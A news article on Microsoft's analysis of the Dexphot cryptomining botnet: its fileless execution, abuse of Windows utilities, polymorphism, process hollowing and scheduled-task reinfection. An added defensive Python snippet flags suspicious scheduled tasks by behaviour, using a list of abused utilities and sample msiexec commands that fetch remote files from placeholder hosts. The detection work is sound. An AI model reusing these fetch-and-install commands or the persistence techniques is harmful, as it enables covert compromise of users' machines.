Microsoft security engineers detailed today a new malware strain that has been infecting Windows computers since October 2018 to hijack their resources to mine cryptocurrency and generate revenue for the attackers.
Named Dexphot, this malware reached its peak in mid-June this year, when its botnet reached almost 80,000 infected computers.
Since then, the number of daily infections has been slowly going down, as Microsoft claims it deployed countermeasures to improve detections and stop attacks.
A complex malware strain for a mundane task
But while Dexphot’s end goal was banal, its methods and techniques stood out for their high level of complexity, something that Microsoft also noticed.
“Dexphot is not the type of attack that generates mainstream media attention,” said Hazel Kim, a malware analyst for the Microsoft Defender ATP Research Team, referring to the malware’s mundane task of mining cryptocurrency, rather than stealing user data.
“It’s one of the countless malware campaigns that are active at any given time. Its goal is a very common one in cybercriminal circles – to install a coin miner that silently steals computer resources and generates revenue for the attackers,” Kim said.
“Yet Dexphot exemplifies the level of complexity and rate of evolution of even everyday threats, intent on evading protections and motivated to fly under the radar for the prospect of profit.”
In a report shared with ZDNet that’s scheduled to go live later today, Kim details Dexphot’s advanced techniques, such as the use of fileless execution, polymorphic techniques, and smart and redundant boot persistence mechanisms.
According to Microsoft, Dexphot is what security researchers call a second-stage payload — a type of malware that’s dropped on systems that are already infected by other malware.
In this case, Dexphot was being dropped on computers that were previously infected with ICLoader, a malware strain that’s usually side-installed as part of software bundles, without the user’s knowledge, or when users downloaded and installed cracked or pirated software.
On some of these ICLoader-infected systems, the ICLoader gang would download and run the Dexphot installer.
Microsoft says this installer would be the only part of the Dexphot malware that would be written to disk, but only for a short period of time. Every other Dexphot file or operation would use a technique known as fileless execution to run inside the computer’s memory only, making the malware’s presence on a system invisible to classic signature-based antivirus solutions.
Furthermore, Dexphot would also employ a technique called “living off the land” (or LOLbins) to (ab)use legitimate Windows processes to execute malicious code, rather than run its own executables and processes.
For example, Microsoft says Dexphot would regularly abuse msiexec.exe, unzip.exe, rundll32.exe, schtasks.exe, and powershell.exe, all legitimate apps that come pre-installed on Windows systems. By using these processes to start and run malicious code, Dexphot effectively became indistinguishable from other local apps that were also using these Windows utilities to do their jobs.
But Dexphot operators didn’t stop here. Because in recent years antivirus products have been using cloud-based systems to inventory and centralize patterns of malicious fileless execution and LOLbins abuse, Dexphot also employed a technique called polymorphism.
This technique refers to malware that constantly changes its artifacts. According to Microsoft, Dexphot operators changed the file names and URLs used in the infection process once every 20-30 minutes.
By the time an antivirus vendor would detect a pattern in Dexphot’s infection chain, that pattern would change, and allow the Dexphot gang to stay a step ahead of cyber-security products.
Multi-layered persistence mechanisms
But no malware stays undetected forever, and even in these cases, the Dexphot gang had planned ahead.
Microsoft says that Dexphot came with clever persistence mechanisms that would often re-infect systems that were not cleaned of all of the malware’s artifacts.
First, the malware used a technique called process hollowing to start two legitimate processes (svchost.exe and nslookup.exe), hollow their content, and run malicious code from within them.
Disguised as legitimate Windows processes, these two Dexphot components would keep an eye out that all the malware’s components were up and running, and reinstall the malware if one of them were stopped. Because there were two “monitoring” processes, even if system administrators or antivirus software removed one, the second would serve as a backup and re-infect the system later on.
Second, as a further failsafe, Dexphot used a series of scheduled tasks to make sure the victim was filelessly reinfected after every reboot, or once every 90 or 110 minutes.
Because the tasks were scheduled to run at regular intervals, they also served as a way for the Dexphot gang to deliver updates to all infected systems.
According to Microsoft, every time one of these tasks ran, it downloaded a file from an attacker’s server, allowing the attacker to modify this file with updated instructions for all of the Dexphot-infected hosts and update their entire botnet within hours after an antivirus vendor deployed any countermeasures.
Further, Microsoft says that polymorphism was also used for these tasks, with the Dexphot gang changing task names at regular intervals. This simple trick allowed the malware to skirt any blocklists that blocked scheduled tasks by their names.
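An added example, not taken from Microsoft's report or from this article: one way a defender can triage a scheduled-task inventory by what a task does (a named LOLBin, a remote URL, the 90 or 110 minute interval) rather than by its name. The task records, names, example.test URLs and severity labels are constructed, and it is an assumption that the task action exposes the download URL on its command line.

```python
import re

# LOLBins and reinfection intervals (minutes) as reported in the article.
LOLBINS = {"msiexec.exe", "unzip.exe", "rundll32.exe", "schtasks.exe", "powershell.exe"}
INTERVALS = {90, 110}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed sample inventory: task names, command lines and URLs are made up.
TASKS = [
    {"name": "GoogleUpdateTaskMachineCore", "repeat_min": 60,
     "action": r'"C:\Program Files\Google\Update\GoogleUpdate.exe" /c'},
    {"name": "Tk3f9a", "repeat_min": 90,
     "action": r"C:\Windows\System32\msiexec.exe /i https://cdn.example.test/a91.zip /q"},
    {"name": "Qx77b1", "repeat_min": 110,
     "action": r"msiexec.exe /i http://cdn.example.test/b02.zip /q"},
    {"name": "NightlyBackup", "repeat_min": 1440,
     "action": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"name": "InventoryAgent", "repeat_min": 90,
     "action": r"powershell.exe -File C:\Tools\inv.ps1"},
]
NAME_BLOCKLIST = {"Tk3f9a"}  # a task name recorded from an earlier infection

def image_name(action):
    """Lower-cased file name of the executable a task action launches."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', action)
    path = (m.group(1) or m.group(2)) if m else ""
    return re.split(r"[\\/]", path)[-1].lower()

def signals(task):
    """Name-independent traits of a task that match the reported behaviour."""
    checks = {
        "lolbin": image_name(task["action"]) in LOLBINS,
        "remote-url": bool(URL_RE.search(task["action"])),
        "interval": task["repeat_min"] in INTERVALS,
    }
    return {name for name, hit in checks.items() if hit}

def triage(task):
    """high/medium: LOLBin fetching a URL; review: two weaker traits; else ok."""
    found = signals(task)
    if {"lolbin", "remote-url"} <= found:
        return "high" if "interval" in found else "medium"
    return "review" if len(found) == 2 else "ok"

def flag_by_name(tasks):
    return [t["name"] for t in tasks if t["name"] in NAME_BLOCKLIST]

def flag_by_behaviour(tasks):
    return {t["name"]: triage(t) for t in tasks if triage(t) != "ok"}
```

On this sample the name blocklist catches only the task whose name was already known, while the behaviour check flags both renamed tasks and leaves the InventoryAgent entry for manual review.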
As Microsoft’s Kim pointed out above, all of these techniques are terribly complicated. One would normally expect these types of redundancies to be found in the infection chains for malware developed by advanced government-backed hacking units.
However, in the last two years, these techniques have been slowly trickling down to cyber-criminal gangs, and are now pretty much a common occurrence in something as mundane as a crypto-currency mining operation like Dexphot, infostealers like Astaroth, or click-fraud operations like Nodersok.